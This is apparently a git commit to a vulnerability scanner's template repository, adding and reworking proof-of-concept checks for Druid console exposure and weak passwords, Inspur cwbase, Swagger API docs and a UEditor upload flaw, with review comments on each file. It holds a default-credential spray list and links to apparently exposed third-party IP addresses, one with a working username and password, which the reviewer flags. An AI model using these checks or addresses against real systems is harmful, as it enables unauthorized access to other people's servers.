init: sync poc

newcodor 2025-06-11 00:17:15 +08:00
parent 9ee51a96d8
commit f25afe6e97
5 changed files with 85 additions and 3 deletions


@ -1,10 +1,11 @@
name: poc-yaml-druid-monitor-unauth name: poc-yaml-druid-monitor-unauth
rules: rules:
- method: GET - method: GET
path: /druid/index.html path: /druid/index.html
expression: | expression: |
response.status == 200 && response.body.bcontains(b"Druid Stat Index") && response.body.bcontains(b"DruidVersion") && response.body.bcontains(b"DruidDrivers") response.status == 200 && response.body.bcontains(b"Druid Stat Index") && response.body.bcontains(b"DruidVersion") && response.body.bcontains(b"DruidDrivers")
detail: detail:
author: met7or author: met7or
links: links:
- https://github.com/alibaba/druid - https://github.com/alibaba/druid
- http://43.130.61.224:8088/druid/index.html
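Review bot: The entry added at the end of `detail.links` is a raw IP address and port rather than a vendor or advisory page, which reads like a third-party host where the console was observed open. A live address in a detection template identifies someone else's system to every reader of the repository, goes stale quickly, and adds nothing the `expression` does not already encode. The same pattern appears in the links added to the weak-password, Swagger and UEditor templates in this commit, and the weak-password one also records a username and password next to the address. I would drop these entries and, if a fixture is needed, reference a local lab instance instead, e.g. `- http://127.0.0.1:8088/druid/index.html  # local test instance`.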


@ -0,0 +1,34 @@
name: poc-yaml-druid-monitor-weakpass
sets:
weakpass:
- loginUsername=admin&loginPassword=admin
- loginUsername=ry&loginPassword=123456
- loginUsername=admin&loginPassword=123456
- loginUsername=ruoyi&loginPassword=admin123
- loginUsername=dy&loginPassword=123456
- loginUsername=ruoyi&loginPassword=123456
- loginUsername=dy&loginPassword=admin123
- loginUsername=druid&loginPassword=druid
- loginUsername=admin&loginPassword=admin123
uri:
- /
- /api/
- /admin/
- /admin-api/
- /prod-api/
- /jeecg-boot/
- /dev-api/
- /system/
- /webpage/system/
rules:
- method: POST
# path: /druid/datasource.json
path: "{{uri}}druid/datasource.json"
body: "{{weakpass}}"
expression: |
response.status == 200 && response.body.bcontains(b"FilterClassNames") && response.body.bcontains(b"com.alibaba.druid")
detail:
author: rootmog
links:
- https://github.com/alibaba/druid
- http://39.108.94.156:8086/druid/index.html(admin/123456)\
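Review bot: The rule never establishes that the console rejects a request without credentials, so an instance with no login configured would presumably satisfy the `FilterClassNames` / `com.alibaba.druid` check on the first attempt and be reported as a weak password rather than as unauthenticated access. A baseline check for the unauthenticated case, or a pointer to the existing unauth template, would keep the two findings distinct. The `sets` block also multiplies 9 credential pairs by 9 prefixes, up to 81 login POSTs per target, which can trip account lockout on the system being assessed; a comment above `sets:` such as `# up to 81 login attempts per target; run only where the lockout policy allows` would tell operators what to expect. The commented-out `# path: /druid/datasource.json` and the trailing `\` on the last link look like leftovers and can be removed.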


@ -0,0 +1,12 @@
name: poc-yaml-inspur-cwbase
rules:
- method: GET
path: /cwbase/
follow_redirects: true
expression: |
response.body.bcontains(bytes("weblogin/index.aspx"))
detail:
author: liuy
info: inspur-cwbase
links:
- https://blog.csdn.net/zzxx191z/article/details/140689290
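Review bot: The `expression` matches a single path string with no status check, so with `follow_redirects: true` any response body that merely mentions `weblogin/index.aspx` is reported. Adding a status condition, `response.status == 200 && response.body.bcontains(b"weblogin/index.aspx")`, narrows that and also matches the `b"..."` literal style of the other templates in this commit instead of `bytes("...")`. The `detail` block carries only `info: inspur-cwbase`; if this is meant as a product fingerprint rather than a confirmed vulnerability, a one-line description saying so would stop it being triaged as a finding.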


@ -10,6 +10,13 @@ sets:
- actuator/swagger-ui.html - actuator/swagger-ui.html
- libs/swagger-ui.html - libs/swagger-ui.html
- template/swagger-ui.html - template/swagger-ui.html
- v2/api-docs
- v3/api-docs
- prod-api/v2/api-docs
- prod-api/v3/api-docs
- swagger/docs/v1
- swagger-resources
- prod-api/swagger-resources
- api_docs - api_docs
- api/docs/ - api/docs/
- api/index.html - api/index.html
@ -23,8 +30,10 @@ rules:
- method: GET - method: GET
path: /{{path}} path: /{{path}}
expression: | expression: |
response.status == 200 && (response.body.bcontains(b"Swagger UI") || response.body.bcontains(b"swagger-ui.min.js")|| response.body.bcontains(b'swagger:') || response.body.bcontains(b'swagger:') || response.body.bcontains(b'Swagger 2.0') || response.body.bcontains(b"\"swagger\":") ) response.status == 200 && (response.body.bcontains(b"Swagger UI") || response.body.bcontains(b"swagger-ui.min.js")|| response.body.bcontains(b'swagger:') || response.body.bcontains(b'swagger:') || response.body.bcontains(b'Swagger 2.0') || response.body.bcontains(b"\"openapi\":") || response.body.bcontains(b"\"swagger\":") || response.body.bcontains(b"\"swaggerVersion\":"))
detail: detail:
author: AgeloVito author: AgeloVito
links: links:
- https://blog.csdn.net/u012206617/article/details/109107210 - https://blog.csdn.net/u012206617/article/details/109107210
- https://aqsys.tapig.com/stage-api/swagger-resources
- http://39.98.195.144:8043/swagger/ui/index(http://39.98.195.144:8043/swagger/docs/v1)
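Review bot: In the rewritten `expression` the clause `response.body.bcontains(b'swagger:')` still appears twice in a row; the duplicate was carried over from the old line and should be dropped while the line is being edited. With three more alternatives added, the condition is now one very long line inside the `|` block; putting one `||` alternative per line would make future changes reviewable. API documentation endpoints such as `v3/api-docs` are often published on purpose, so `detail` would benefit from a short description stating that a match indicates exposed API documentation to be reviewed, not a confirmed flaw.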


@ -1,7 +1,32 @@
name: poc-yaml-ueditor-cnvd-2017-20077-file-upload name: poc-yaml-ueditor-cnvd-2017-20077-file-upload
sets:
uri:
- /
- /content/
- /Content/plugins/
- /Content/js/
- /Utility/
- /js/
- /plugins/
- /scripts/
- /Scripts/
- /WebComm/CommScripts/
- /static/
edit:
- ueditor
- Ueditor
- editor
- ueditor1_4_3_3
- ueditor1_4_3_3-utf8-net/utf8-net
net:
- /net/
- /
controller:
- controller.ashx?
- "?"
rules: rules:
- method: GET - method: GET
path: /ueditor/net/controller.ashx?action=catchimage&encode=utf-8 path: "{{uri}}{{edit}}{{net}}{{controller}}ccc=test&action=catchimage&encode=utf-8"
headers: headers:
Accept-Encoding: 'deflate' Accept-Encoding: 'deflate'
follow_redirects: false follow_redirects: false
@ -13,5 +38,6 @@ detail:
links: links:
- https://zhuanlan.zhihu.com/p/85265552 - https://zhuanlan.zhihu.com/p/85265552
- https://www.freebuf.com/vuls/181814.html - https://www.freebuf.com/vuls/181814.html
- http://123.57.69.82:20000/Utility/UEditor/net?action=catchimage
exploit: >- exploit: >-
http://localhost/ueditor/net/controller.ashx?action=catchimage&encode=utf-8 http://localhost/ueditor/net/controller.ashx?action=catchimage&encode=utf-8
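Review bot: The rewritten `path` carries an unexplained `ccc=test` parameter and is expanded from four sets (11 × 5 × 2 × 2), so a single target now receives up to 220 requests instead of one. A comment above `sets:` should state the request count and why the filler parameter is there; it looks like padding so that `action` can always be appended with `&` after either `controller.ashx?` or `?`, but that is inferred. Something like `# ccc=test is a dummy first parameter so the query string is valid for both controller values` would do. The `exploit` text at the end of the file still names only the original fixed path, so it no longer describes what the rule sends.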